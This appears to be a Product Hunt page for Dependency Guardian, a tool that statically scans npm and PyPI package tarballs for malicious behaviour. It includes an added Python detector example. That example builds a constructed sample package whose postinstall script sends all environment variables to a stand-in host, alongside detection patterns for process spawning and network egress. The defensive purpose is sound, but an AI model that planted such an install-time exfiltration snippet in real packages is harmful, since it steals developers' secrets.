This product has not been featured by Product Hunt yet, so it is not yet shown by default on their landing page.
[Dashboard panels: Product upvotes vs the next 3; Product comments vs the next 3; Product upvote speed vs the next 3; Product upvotes and comments; Product vs the next 3 (data not loaded)]
Dependency Guardian
Your dependencies are your biggest attack surface.
Every app today relies on hundreds of open source packages written by strangers. Tools like npm audit and CVE databases only catch known threats (attacks that have already happened). When you install a dependency or open a pull request, Dependency Guardian downloads the package tarball and runs behavioral detectors directly against the source code. No CVE lookups, just static analysis. That means it can catch zero-day attacks before they ever reach your production pipeline.
Hey Product Hunt! 👋
I built Dependency Guardian after being affected by the Shai Hulud npm worm attack. It made clear how quietly a compromised dependency can unravel everything you've worked on.
Dependency Guardian runs as a GitHub App or CLI tool and is designed to fit into your existing workflow without friction. There is a free tier and no account required to get started.
We only send your requirements.txt and lockfile (package names and versions) to the server. Your source code never leaves your machine. The API wrapper is open source if you want to audit it yourself.
GitHub Action: https://github.com/WestBayBerry/...
npm package: https://www.npmjs.com/package/@w...
On accuracy: we run every release against 156,000 real packages, both malicious and clean, pulled from public threat intelligence feeds across npm and PyPI. Current results show a 99.19% catch rate on npm and 99.55% on PyPI, with a 99.3% and 99.9% clean pass rate respectively. All detection is static analysis with no LLM inference, meaning results are fully deterministic. Full methodology and limitations are on our benchmark page.
I plan to add support for more languages in the future and have already started working on that.
Would love to hear your feedback.
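The description and the maker's comment above explain the approach (behavioral detectors run over the downloaded package tarball instead of a CVE lookup, a deterministic static verdict, and a client that sends only package names and versions from the lockfile) but do not show the detector code. The following is an added example written for this page, not Dependency Guardian's own code or the open-source API wrapper: the detector names and regexes, the "block/review/pass" policy, and both sample packages ("totally-fine-utils", "clean-lib") and the sample lockfile are hypothetical and constructed inline so the script runs offline.

```python
# Added example for this page, not Dependency Guardian's code. Detector rules,
# the verdict policy and both sample packages are hypothetical/constructed.
import io
import json
import re
import tarfile

# Capability detectors over JavaScript source: what the code CAN DO, not a CVE id.
DETECTORS = [
    ("child-process", re.compile(r"""require\(\s*['"]child_process['"]\s*\)""")),
    ("network-egress", re.compile(r"""require\(\s*['"](?:https?|net|dns|dgram)['"]\s*\)|\bfetch\s*\(""")),
    ("env-harvest", re.compile(r"\bprocess\.env\b")),
    ("eval-dynamic", re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")),
    ("obfuscated-hex", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")),
]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # run automatically on `npm install`


def lockfile_manifest(lock_json: str) -> list[tuple[str, str]]:
    """(name, version) pairs from a package-lock v2/v3 'packages' map: the only
    data a client needs to send to a remote scanner, never the source code."""
    pairs = []
    for path, meta in json.loads(lock_json).get("packages", {}).items():
        if path == "":  # "" is the root project, not a dependency
            continue
        pairs.append((path.rsplit("node_modules/", 1)[-1], meta["version"]))  # keeps @scope/name
    return pairs


def scan_tarball(data: bytes) -> dict[str, list[str]]:
    """Run every detector over a gzipped npm tarball; {detector: [files where it fired]}."""
    findings: dict[str, list[str]] = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar:
            if not member.isfile():
                continue
            text = tar.extractfile(member).read().decode("utf-8", errors="replace")
            if member.name.endswith("package.json"):
                # Lifecycle scripts are the install-time entry point of worms and stealers.
                scripts = json.loads(text).get("scripts", {})
                for hook in INSTALL_HOOKS:
                    if hook in scripts:
                        findings.setdefault("install-hook", []).append(f"{member.name}:{hook}")
            elif member.name.endswith((".js", ".mjs", ".cjs")):
                for name, pattern in DETECTORS:
                    if pattern.search(text):
                        findings.setdefault(name, []).append(member.name)
    return findings


def verdict(findings: dict[str, list[str]]) -> str:
    """Deterministic policy over detector hits: same tarball, same answer, no model."""
    hits = set(findings)
    # Runs at install time AND executes/reaches out: the credential-stealer / worm shape.
    if "install-hook" in hits and hits & {"network-egress", "child-process", "eval-dynamic"}:
        return "block"
    return "review" if hits else "pass"


def build_tarball(files: dict[str, str]) -> bytes:
    """Build a gzipped tarball in memory (only used to construct the samples below)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content.encode())
            tar.addfile(info, io.BytesIO(content.encode()))
    return buf.getvalue()


# Constructed samples; neither is a real published package.
MALICIOUS_TARBALL = build_tarball({
    "package/package.json": json.dumps({"name": "totally-fine-utils", "version": "1.0.3",
                                        "scripts": {"postinstall": "node index.js"}}),
    "package/index.js": "const cp = require('child_process');\n"
                        "const https = require('https');\n"
                        "const loot = JSON.stringify(process.env);\n"
                        "https.request({host: 'example.invalid', method: 'POST'}).end(loot);\n",
})
CLEAN_TARBALL = build_tarball({
    "package/package.json": json.dumps({"name": "clean-lib", "version": "1.0.0", "main": "index.js"}),
    "package/index.js": "module.exports = function add(a, b) { return a + b; };\n",
})
SAMPLE_LOCK = json.dumps({"name": "demo-app", "lockfileVersion": 3, "packages": {
    "": {"name": "demo-app", "version": "0.1.0"},
    "node_modules/totally-fine-utils": {"version": "1.0.3"},
    "node_modules/totally-fine-utils/node_modules/@acme/nested": {"version": "0.9.0"},
}})

if __name__ == "__main__":
    print("manifest that leaves the machine:", lockfile_manifest(SAMPLE_LOCK))
    for label, blob in (("malicious", MALICIOUS_TARBALL), ("clean", CLEAN_TARBALL)):
        hits = scan_tarball(blob)
        print(f"{label}: {verdict(hits)} {hits}")
```

The point of the combination rule in `verdict` is that no single detector is damning on its own (plenty of legitimate packages read `process.env` or spawn processes); it is the install hook paired with execution or egress that matches the shape of a self-propagating npm worm. Real detectors would also have to handle minified and string-assembled requires, which these regexes deliberately do not attempt.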
About Dependency Guardian on Product Hunt
“Your dependencies are your biggest attack surface.”
Dependency Guardian was submitted on Product Hunt and earned 0 upvotes and 2 comments, placing #115 on the daily leaderboard.
On the analytics side, Dependency Guardian competes within Software Engineering, Developer Tools and Security — topics that collectively have 555.9k followers on Product Hunt. The dashboard above tracks how Dependency Guardian performed against the three products that launched closest to it on the same day.
Who hunted Dependency Guardian?
Dependency Guardian was hunted by mckeane mcbrearty. A “hunter” on Product Hunt is the community member who submits a product to the platform — uploading the images, the link, and tagging the makers behind it. Hunters typically write the first comment explaining why a product is worth attention, and their followers are notified the moment they post. Around 79% of featured launches on Product Hunt are self-hunted by their makers, but a well-known hunter still acts as a signal of quality to the rest of the community. See the full all-time top hunters leaderboard to discover who is shaping the Product Hunt ecosystem.
For a complete overview of Dependency Guardian including community comment highlights and product details, visit the product overview.